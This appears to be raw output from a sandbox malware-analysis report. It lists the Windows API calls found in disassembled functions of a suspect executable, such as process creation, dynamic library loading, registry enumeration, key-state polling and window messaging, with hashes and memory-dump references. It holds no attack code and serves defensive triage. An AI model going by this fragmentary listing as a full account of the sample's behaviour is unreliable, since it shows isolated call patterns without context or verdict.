                                                                                • Instruction ID: 69dc6a51edbe5ee19f0a67ea17106520569d15485a53dd2368b21631de8c881a
                                                                                • Opcode Fuzzy Hash: d91e6c2000c0240fbd4bddc97b5ceaedcb35721efeb9dd6214f1cb2b98bf5e44
                                                                                • Instruction Fuzzy Hash: 2A21D471A4420AFBEF205F64DC8CEBB77ADEF99364F184218FA11A2190D739CC41A761
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00769588
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007695B9
                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 007695CB
                                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00769605
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandle$FilePipe
                                                                                • String ID: nul
                                                                                • API String ID: 4209266947-2873401336
                                                                                • Opcode ID: ffa70da1e8b9938f854a4fa5ccdff2144c16872c38fffa4d1f1ba13818155534
                                                                                • Instruction ID: 61188469e1148642907b7955e5707683a56024ac8a871779f98df511f847e549
                                                                                • Opcode Fuzzy Hash: ffa70da1e8b9938f854a4fa5ccdff2144c16872c38fffa4d1f1ba13818155534
                                                                                • Instruction Fuzzy Hash: D0215E70600205ABDB219F29DC05A9A7BBCBF85720F204A19FEA3D72D1D778DD55CB20
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00769653
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00769683
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00769694
                                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007696CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandle$FilePipe
                                                                                • String ID: nul
                                                                                • API String ID: 4209266947-2873401336
                                                                                • Opcode ID: ed767410d1a444450eb67a0178ecf1ad0137d264b002d37c27a93ae8b0f0a1a5
                                                                                • Instruction ID: 16fc8701ca4826cb840b56ebf652cb21bc2d38b9ea04161e94a2616cb08b950d
                                                                                • Opcode Fuzzy Hash: ed767410d1a444450eb67a0178ecf1ad0137d264b002d37c27a93ae8b0f0a1a5
                                                                                • Instruction Fuzzy Hash: 7021AF716003059BDB209F69DC04E9A77FCAF85720F204A19FEA2E32D0EB789C41CB25
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0076DB0A
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0076DB5E
                                                                                • __swprintf.LIBCMT ref: 0076DB77
                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,007BDC00), ref: 0076DBB5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                • String ID: %lu
                                                                                • API String ID: 3164766367-685833217
                                                                                • Opcode ID: 649db7adf82124f5f9cc5430ea26c3979fe0e83892ffd0447ceac50e4e53d4cd
                                                                                • Instruction ID: af139868c0cac873ab5602329dc1491f16757eab352c5ab9993eff60775a27dd
                                                                                • Opcode Fuzzy Hash: 649db7adf82124f5f9cc5430ea26c3979fe0e83892ffd0447ceac50e4e53d4cd
                                                                                • Instruction Fuzzy Hash: 76218375A00108EFCB11EF64D985EEEBBB9EF89704B014069F90AD7251DB74EE41CB61
                                                                                APIs
                                                                                  • Part of subcall function 0075C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0075C84A
                                                                                  • Part of subcall function 0075C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0075C85D
                                                                                  • Part of subcall function 0075C82D: GetCurrentThreadId.KERNEL32 ref: 0075C864
                                                                                  • Part of subcall function 0075C82D: AttachThreadInput.USER32(00000000), ref: 0075C86B
                                                                                • GetFocus.USER32 ref: 0075CA05
                                                                                  • Part of subcall function 0075C876: GetParent.USER32(?), ref: 0075C884
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0075CA4E
                                                                                • EnumChildWindows.USER32(?,0075CAC4), ref: 0075CA76
                                                                                • __swprintf.LIBCMT ref: 0075CA90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                • String ID: %s%d
                                                                                • API String ID: 3187004680-1110647743
                                                                                • Opcode ID: 6bb77cb4f780d2dddea97670b73f97622209acab95fe357d9c7f5b749361476e
                                                                                • Instruction ID: 90be2b55ebf7fc7f6392c9400e5f18edbe8402f1d2100c9b81074fe8b0913cf1
                                                                                • Opcode Fuzzy Hash: 6bb77cb4f780d2dddea97670b73f97622209acab95fe357d9c7f5b749361476e
                                                                                • Instruction Fuzzy Hash: 251175B1500305BBCF12BF609C89FE93B78AB45715F008066FD19AA142DBB89949DB70
                                                                                APIs
                                                                                • __lock.LIBCMT ref: 00747AD8
                                                                                  • Part of subcall function 00747CF4: __mtinitlocknum.LIBCMT ref: 00747D06
                                                                                  • Part of subcall function 00747CF4: EnterCriticalSection.KERNEL32(00000000,?,00747ADD,0000000D), ref: 00747D1F
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00747AE5
                                                                                • __lock.LIBCMT ref: 00747AF9
                                                                                • ___addlocaleref.LIBCMT ref: 00747B17
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                • String ID: `z
                                                                                • API String ID: 1687444384-4273283268
                                                                                • Opcode ID: 5e3da2786f1513063e135fa643e43e97e83fd16efb518a75019c667f4ccef296
                                                                                • Instruction ID: cf5364346687a112d70a46a3f7a18c1a36b780aee5ceb7e6a282387f1eba4478
                                                                                • Opcode Fuzzy Hash: 5e3da2786f1513063e135fa643e43e97e83fd16efb518a75019c667f4ccef296
                                                                                • Instruction Fuzzy Hash: D6016DB1504B00EFD720DF75D90974AB7F0EF40321F20890EE49A976A0CBB8A640CB56
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0078E33D
                                                                                • _memset.LIBCMT ref: 0078E34C
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007E3D00,007E3D44), ref: 0078E37B
                                                                                • CloseHandle.KERNEL32 ref: 0078E38D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                                • String ID: D=~
                                                                                • API String ID: 3277943733-1434970251
                                                                                • Opcode ID: 12f8f5e7869bd2a1bd0e48646d99f1f7924ff5ec46fd327e501085364e341f3d
                                                                                • Instruction ID: d7e5ea2274a9b1a7915c2fb2643ebfdd7fe895ebef777819920cf56a9daeea41
                                                                                • Opcode Fuzzy Hash: 12f8f5e7869bd2a1bd0e48646d99f1f7924ff5ec46fd327e501085364e341f3d
                                                                                • Instruction Fuzzy Hash: 8AF03AB1741344BAE210AB61AC89F777A5DDB09754F018461BE09DB1A2D37D9E108AA8
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007819F3
                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00781A26
                                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00781B49
                                                                                • CloseHandle.KERNEL32(?), ref: 00781BBF
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                • String ID:
                                                                                • API String ID: 2364364464-0
                                                                                • Opcode ID: 02d716d484d437140c3ba34fb82d3266031278ce1fa9085bfd8ddd01abd21c9e
                                                                                • Instruction ID: cf3db1c50986709e5cbf579509918e7ceae7426b7545c731f68bf7d1cce7703f
                                                                                • Opcode Fuzzy Hash: 02d716d484d437140c3ba34fb82d3266031278ce1fa9085bfd8ddd01abd21c9e
                                                                                • Instruction Fuzzy Hash: 9E8164B0640214EBDF10AF54C88ABADBBE9AF44720F14C459F905AF383D7B8AD41CB90
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0078E1D5
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0078E20D
                                                                                • IsDlgButtonChecked.USER32(?,00000001), ref: 0078E248
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0078E269
                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0078E281
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                • String ID:
                                                                                • API String ID: 3188977179-0
                                                                                • Opcode ID: 3a3ec1303646e241b4c09c8e233185d65751b4480c74531cc1692fd2aee54f05
                                                                                • Instruction ID: 2937ceceff060be29736f0c753dba6fff9d6f099f9d65bb1f2a061f7adf55a9a
                                                                                • Opcode Fuzzy Hash: 3a3ec1303646e241b4c09c8e233185d65751b4480c74531cc1692fd2aee54f05
                                                                                • Instruction Fuzzy Hash: 7861B534A80248EFDB20EF58C899FAA77BAFF89300F144499F955973A1C778AD40CB11
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 00761CB4
                                                                                • VariantClear.OLEAUT32(00000013), ref: 00761D26
                                                                                • VariantClear.OLEAUT32(00000000), ref: 00761D81
                                                                                • VariantClear.OLEAUT32(?), ref: 00761DF8
                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00761E26
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                • String ID:
                                                                                • API String ID: 4136290138-0
                                                                                • Opcode ID: 469538a545aa9e3a8ce91f2e44bc6704cb70077c0029adb474b93cce538e8173
                                                                                • Instruction ID: 57ea24e0db7ddc7c4e957942227607f34f12136c2d70b4978efdbcbfb80ea77e
                                                                                • Opcode Fuzzy Hash: 469538a545aa9e3a8ce91f2e44bc6704cb70077c0029adb474b93cce538e8173
                                                                                • Instruction Fuzzy Hash: A4517DB5A00249EFDB14CF58C884AAAB7B8FF8C314B198559ED4ADB305D334E911CFA0
                                                                                APIs
                                                                                  • Part of subcall function 0072936C: __swprintf.LIBCMT ref: 007293AB
                                                                                  • Part of subcall function 0072936C: __itow.LIBCMT ref: 007293DF
                                                                                • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 007806EE
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0078077D
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0078079B
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 007807E1
                                                                                • FreeLibrary.KERNEL32(00000000,00000004), ref: 007807FB
                                                                                  • Part of subcall function 0073E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0076A574,?,?,00000000,00000008), ref: 0073E675
                                                                                  • Part of subcall function 0073E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0076A574,?,?,00000000,00000008), ref: 0073E699
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 327935632-0
                                                                                • Opcode ID: a69899c1c572af30b735e6090552b4663cc91a0f7d8355c4671e9a7f35f09308
                                                                                • Instruction ID: ce3d1d2dd990f47ba6d4cd50c4d623a7fb39b4a8330c9cbf95816a4211039452
                                                                                • Opcode Fuzzy Hash: a69899c1c572af30b735e6090552b4663cc91a0f7d8355c4671e9a7f35f09308
                                                                                • Instruction Fuzzy Hash: 57515775A00219DFCB10EFA8C8859ADB7B5BF59310F058059EA06AB352DB38ED49CB90
                                                                                APIs
                                                                                  • Part of subcall function 00783C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00782BB5,?,?), ref: 00783C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00782EEF
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00782F2E
                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00782F75
                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 00782FA1
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00782FAE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 3740051246-0
                                                                                • Opcode ID: cb6e1957cc0cf73a638e1cb1cd6df9a5576eb09e0656c0b1ddfac6b917d7b83e
                                                                                • Instruction ID: cc0b23987df3884cfa1a3f40950cf41f3409602c6f827c2b908ff491d422163b
                                                                                • Opcode Fuzzy Hash: cb6e1957cc0cf73a638e1cb1cd6df9a5576eb09e0656c0b1ddfac6b917d7b83e
                                                                                • Instruction Fuzzy Hash: DC514A71208204EFD715EF54C895EAEB7F9BF88304F04881DF69697292DB38E905CB52
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 39ecab4cffe4947dc0e017491efba93696df112dbc07740ca2b15a4fdda46252
                                                                                • Instruction ID: f620d7f14755f3cdeb82651a3c9a0823135263c253dcfc280199548cd2d28ee6
                                                                                • Opcode Fuzzy Hash: 39ecab4cffe4947dc0e017491efba93696df112dbc07740ca2b15a4fdda46252
                                                                                • Instruction Fuzzy Hash: 7A41D239A40244AFC722FB68CC48FA9BF68EB0D310F144265F95AA72D1C738AD41DB74
                                                                                APIs
                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007712B4
                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007712DD
                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0077131C
                                                                                  • Part of subcall function 0072936C: __swprintf.LIBCMT ref: 007293AB
                                                                                  • Part of subcall function 0072936C: __itow.LIBCMT ref: 007293DF
                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00771341
                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00771349
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 1389676194-0
                                                                                • Opcode ID: e6e0dbf70cbabed72f688387db2d326a9e52d4be2388f817b2371c3f51a52bf4
                                                                                • Instruction ID: ba22670eb49174e747a5c054812003518dab5e3089b154c12bc1c48bf2126d32
                                                                                • Opcode Fuzzy Hash: e6e0dbf70cbabed72f688387db2d326a9e52d4be2388f817b2371c3f51a52bf4
                                                                                • Instruction Fuzzy Hash: BD41F935A00115DFDF01EF64C995AAEBBF5FF49310B148099E90AAB3A2CB35ED01DB54
                                                                                APIs
                                                                                • GetCursorPos.USER32(000000FF), ref: 0073B64F
                                                                                • ScreenToClient.USER32(00000000,000000FF), ref: 0073B66C
                                                                                • GetAsyncKeyState.USER32(00000001), ref: 0073B691
                                                                                • GetAsyncKeyState.USER32(00000002), ref: 0073B69F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                • String ID:
                                                                                • API String ID: 4210589936-0
                                                                                • Opcode ID: 151e8ad4cb8158f8dc09ecb1af2c4f3d3ae910cd8e4b992f088505d8da8f9d20
                                                                                • Instruction ID: 6ba056938ce18bb355d35a8dfe50d484485a925bca805fce46acc829191a94dd
                                                                                • Opcode Fuzzy Hash: 151e8ad4cb8158f8dc09ecb1af2c4f3d3ae910cd8e4b992f088505d8da8f9d20
                                                                                • Instruction Fuzzy Hash: D2418131504109FBDF25DF64C849AEDBB75FB05320F104319F82992291C738AD50DFA1
                                                                                APIs
                                                                                • GetWindowRect.USER32(?,?), ref: 0075B369
                                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 0075B413
                                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0075B41B
                                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 0075B429
                                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0075B431
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                • String ID:
                                                                                • API String ID: 3382505437-0
                                                                                • Opcode ID: 251da6b4bd84f1f46713d5a0ac0ba9e1d7b652e4d060f28fb2c84fcfd7b3aa07
                                                                                • Instruction ID: 0dd431b25afef470a58baca324efa133d8dc54292d5108e6daf776005829a85e
                                                                                • Opcode Fuzzy Hash: 251da6b4bd84f1f46713d5a0ac0ba9e1d7b652e4d060f28fb2c84fcfd7b3aa07
                                                                                • Instruction Fuzzy Hash: 1E31AE7190021DEBDF14CFA8D94DAEE7BB5EB45316F108229F921AA1D1C3B89D58CF90
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 0075DBD7
                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0075DBF4
                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0075DC2C
                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0075DC52
